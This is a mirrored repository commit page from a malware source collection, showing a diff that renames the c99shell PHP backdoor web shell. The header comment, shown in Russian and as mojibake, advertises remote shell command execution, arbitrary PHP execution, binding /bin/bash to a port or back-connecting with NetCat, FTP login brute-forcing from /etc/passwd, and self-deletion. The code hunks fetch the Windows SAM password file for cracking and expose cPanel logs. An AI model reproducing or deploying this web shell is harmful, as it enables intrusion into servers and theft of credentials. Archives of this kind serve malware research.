ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-19 18:06:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Rename Backdoor.PHP.C99Shell.d to Backdoor.PHP.C99Shell.a.9

Browse Source
This commit is contained in:
vxunderground 2020-10-15 20:49:03 -05:00 committed by GitHub
parent cc8557af00
commit f9c4042ed9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3075 additions and 3075 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
PHP/Backdoor.PHP.C99Shell.d → PHP/Backdoor.PHP.C99Shell.a.9
View File

@ -4,49 +4,49 @@
*
* c99shell.php v.1.0 pre-release build #9
* Freeware license.
* © CCTeaM.
* c99shell - файл-менеджер через www-броузер, "заточеный" для взлома.
* Вы можете бесплатно скачать последнюю версию на домашней страничке продукта:
* © CCTeaM.
* c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ âçëîìà.
* Âû ìîæåòå áåñïëàòíî ñêà÷àòü ïîñëåäíþþ âåðñèþ íà äîìàøíåé ñòðàíè÷êå ïðîäóêòà:
http://ccteam.ru/releases/c99shell
*
* WEB: http://ccteam.ru
* ICQ UIN #: 656555
*
* Особенности:
* + управление локальными и удаленными (ftp, samba) файлами/папками, сортировка
* закачивание скачивание файлов и папок
* (предворительно упаковывается/распаковывается через tar)
* продвинутый поиск (возможен внутри файлов)
* modify-time и access-time у файлов не меняются при редактировании (выкл./вкл. параметром $filestealth)
* + продвинутый SQL-менеджер не уступающий phpmyadmin,
просмотр/создание/редактирование БД/таблиц, просмотр файлов через брешь в mysql
* + управление процессами
* + удобное выполнение shell-команд (много алиасов, можно редактировать)
* + выполнение произвольного PHP-кода
* + кодировщик данных через md5, unix-md5, sha1, crc32, base64
* + быстрый локальный анализ безопасности ОС
* + быстрое ftp-сканирование на связки login;login из /etc/passwd (обычно дает доступ к 1/100 аккаунтов)
* постраничный вывод, сортировка, групповые операции над БД/таблицами, управление процессами SQL)
* + скрипт "любит" include: автоматически ищет переменные с дескрипторами и вставляет их в ссылки (опциально)
также можно изменить $surl (базовая ссылка) как через конфигурацию (принудительно) так и через cookie "c99sh_surl",
идет авто-запись значения $set_surl в cookie "set_surl"
* + возможность "забиндить" /bin/bash на определенный порт с произвольным паролем,
* или сделать back connect (производится тестирование соеденения, и выводятся параметры для запуска NetCat).
* + возможность быстрого само-удаления скрипта
* + автоматизированая отправка сообщений о недоработках и пожеланиях автору (через mail())
* Îñîáåííîñòè:
* + óïðàâëåíèå ëîêàëüíûìè è óäàëåííûìè (ftp, samba) ôàéëàìè/ïàïêàìè, ñîðòèðîâêà
* çàêà÷èâàíèå ñêà÷èâàíèå ôàéëîâ è ïàïîê
* (ïðåäâîðèòåëüíî óïàêîâûâàåòñÿ/ðàñïàêîâûâàåòñÿ ÷åðåç tar)
* ïðîäâèíóòûé ïîèñê (âîçìîæåí âíóòðè ôàéëîâ)
* modify-time è access-time ó ôàéëîâ íå ìåíÿþòñÿ ïðè ðåäàêòèðîâàíèè (âûêë./âêë. ïàðàìåòðîì $filestealth)
* + ïðîäâèíóòûé SQL-ìåíåäæåð íå óñòóïàþùèé phpmyadmin,
ïðîñìîòð/ñîçäàíèå/ðåäàêòèðîâàíèå ÁÄ/òàáëèö, ïðîñìîòð ôàéëîâ ÷åðåç áðåøü â mysql
* + óïðàâëåíèå ïðîöåññàìè
* + óäîáíîå âûïîëíåíèå shell-êîìàíä (ìíîãî àëèàñîâ, ìîæíî ðåäàêòèðîâàòü)
* + âûïîëíåíèå ïðîèçâîëüíîãî PHP-êîäà
* + êîäèðîâùèê äàííûõ ÷åðåç md5, unix-md5, sha1, crc32, base64
* + áûñòðûé ëîêàëüíûé àíàëèç áåçîïàñíîñòè ÎÑ
* + áûñòðîå ftp-ñêàíèðîâàíèå íà ñâÿçêè login;login èç /etc/passwd (îáû÷íî äàåò äîñòóï ê 1/100 àêêàóíòîâ)
* ïîñòðàíè÷íûé âûâîä, ñîðòèðîâêà, ãðóïïîâûå îïåðàöèè íàä ÁÄ/òàáëèöàìè, óïðàâëåíèå ïðîöåññàìè SQL)
* + ñêðèïò "ëþáèò" include: àâòîìàòè÷åñêè èùåò ïåðåìåííûå ñ äåñêðèïòîðàìè è âñòàâëÿåò èõ â ññûëêè (îïöèàëüíî)
òàêæå ìîæíî èçìåíèòü $surl (áàçîâàÿ ññûëêà) êàê ÷åðåç êîíôèãóðàöèþ (ïðèíóäèòåëüíî) òàê è ÷åðåç cookie "c99sh_surl",
èäåò àâòî-çàïèñü çíà÷åíèÿ $set_surl â cookie "set_surl"
* + âîçìîæíîñòü "çàáèíäèòü" /bin/bash íà îïðåäåëåííûé ïîðò ñ ïðîèçâîëüíûì ïàðîëåì,
* èëè ñäåëàòü back connect (ïðîèçâîäèòñÿ òåñòèðîâàíèå ñîåäåíåíèÿ, è âûâîäÿòñÿ ïàðàìåòðû äëÿ çàïóñêà NetCat).
* + âîçìîæíîñòü áûñòðîãî ñàìî-óäàëåíèÿ ñêðèïòà
* + àâòîìàòèçèðîâàíàÿ îòïðàâêà ñîîáùåíèé î íåäîðàáîòêàõ è ïîæåëàíèÿõ àâòîðó (÷åðåç mail())
*
* Приведен далеко не полный список возможностей.
* Ïðèâåäåí äàëåêî íå ïîëíûé ñïèñîê âîçìîæíîñòåé.
*
* Ожидаемые изменения:
* ~ Развитие sql-менеджера
* ~ Добавление недостающих расширений файлов
* Îæèäàåìûå èçìåíåíèÿ:
* ~ Ðàçâèòèå sql-ìåíåäæåðà
* ~ Äîáàâëåíèå íåäîñòàþùèõ ðàñøèðåíèé ôàéëîâ
*
* ~-~ Пишите обо всех найденых недоработках, желаемых изменениях и доработках (даже о самых незначительных!)
в ICQ UIN #656555 либо через раздел "feedback", будут рассмотрены все предложения и пожелания.
* ~-~ Ïèøèòå îáî âñåõ íàéäåíûõ íåäîðàáîòêàõ, æåëàåìûõ èçìåíåíèÿõ è äîðàáîòêàõ (äàæå î ñàìûõ íåçíà÷èòåëüíûõ!)
â ICQ UIN #656555 ëèáî ÷åðåç ðàçäåë "feedback", áóäóò ðàññìîòðåíû âñå ïðåäëîæåíèÿ è ïîæåëàíèÿ.
*
* Last modify: 17.07.2005
*
* © Captain Crunch Security TeaM. Coded by tristram
* © Captain Crunch Security TeaM. Coded by tristram
*
******************************************************************************************************
*/
@ -747,7 +747,7 @@ function mysql_query_form()
if ($tbl_struct)
{
echo "<td valign=\"top\"><b>Fields:</b><br>";
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
echo "</td></tr></table>";
}
}
@ -1051,7 +1051,7 @@ if ($act == "sql")
{
echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
$c = 0;
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;}
if (!$c) {echo "No tables found in database.";}
}
}
@ -1347,7 +1347,7 @@ if ($act == "sql")
$i++;
}
echo "<tr bgcolor=\"000000\">";
echo "<td><center><b>»</b></center></td>";
echo "<td><center><b>»</b></center></td>";
echo "<td><center><b>".$i." table(s)</b></center></td>";
echo "<td><b>".$trows."</b></td>";
echo "<td>".$row[1]."</td>";
@ -1576,7 +1576,7 @@ if ($act == "security")
{
$v = $_SERVER["WINDIR"]."\repair\sam";
if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
}
if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}